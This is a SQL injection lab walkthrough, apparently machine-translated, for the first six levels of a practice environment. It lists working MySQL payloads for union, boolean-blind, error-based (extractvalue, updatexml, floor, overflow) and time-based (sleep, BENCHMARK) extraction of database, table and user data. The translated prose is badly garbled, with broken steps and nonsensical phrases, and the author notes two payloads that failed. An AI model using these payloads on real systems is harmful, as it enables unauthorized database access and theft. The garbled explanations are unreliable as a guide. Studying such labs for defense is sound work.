first round
Joint injection
1. Prepare
2. Add 'truncated
3.order by determining the number of queries column
4. Ibid.
The union query field position determination
6. check the database name
7.1 name look-up table
7.2 check the column name
8. survey data
The second hurdle
Single quotation marks do not need to cut, with the integer value query code
Otherwise the same as the first hurdle
Third off
Described with the ( '') structure
Replaced by ') to
Fourth off
Illustrated by the ( "") structure
Replaced ") to
Fifth off
No matter what inputs are prompted ur in ....
There is no echo, try blinds
Boolean blinds
Boolean blind way there ----
left (1,2) = 3 // taken from the left side of the front 1 2, and 3 of the value comparison
ascii (substr (1,2,3)) // 3, taken from the second position start string length value is 1, the value is converted to ascii
regexp // regular match specified target values and value az, right 1, 0 errors
select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^us[a-z]' limit 0,1)
like // and the same regexp
the ord () and MID ()
(1)用left
1. Test
2. The first test database is greater than b
Is greater than y
Thus between the first bit of b y, can be used to test dichotomy, then no dichotomy can be a number equal specimens
Thus the first two measurements, and so on
(2) with a longitudinal length amount database
(3) and with substr ascii
and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>101 --+
The first test table name is not e
The second substr (x, 2,1) 2 can be changed, so
Acquiring a third table, the change limit 2,1 to limit 0,1, 2 represents from the start (3 cis-bit), take the value 1
(4) regexp
Guess columns users table
and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^username' limit 0,1)
(5) with mid and ord
Obtain user table of contents
and ord(mid((select ifnull(cast(username as char),0x20)from security.users order by id limit 0,1),1,1))=68
Obtaining the first character of the first row of the table username users in the ascii, compared with 68
Error blinds
Blinds error types are ----
count,floor,group by
double value out of range
bigint overflow xpath function --extractvalue and updatexml
Data repeatability
(1) floor function
union select 1,count(*),concat(0x3a,(select user()),0x3a,floor(rand(0)*2))a from information_schema.columns group by a
(2) double value out of range
(Not able to reproduce successfully)
union select (exp(~(select*from(select user())x))),2,3
(3) bigint overflow
(Also failed to reproduce successfully)
union select(!(select * from(select user())x) - ~0),2,3
(4) xpath function
and extractvalue(1,concat(0x7e,(select @@version),0x7e))
and updatexml(1,concat(0x7e,(select@@version),0x7e),1)
(5) Data repeatability
union select 1,2,3 from(select NAME_CONST(version(),1),NAME_CONST(version(),1))x
Time blinds
Time blinds types are ----
sleep () function
BENCHMARK () function
(1) sleep function
Error, 5 seconds delay
correct
and If(ascii(substr(database(),1,1))=115,1,sleep(5))
(2) BENCHMARK function
correct
UNION SELECT(IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null)),2,3 FROM(select database() as current)as tb1
When the correct results when run ENCODE ( 'MSG', 'by5seconds') operation 50 million times, will take some time and CPU resources
Sixth off
Id parameters of the process, the 'replaced' 'to
So far has been basically finished describes the general type of injection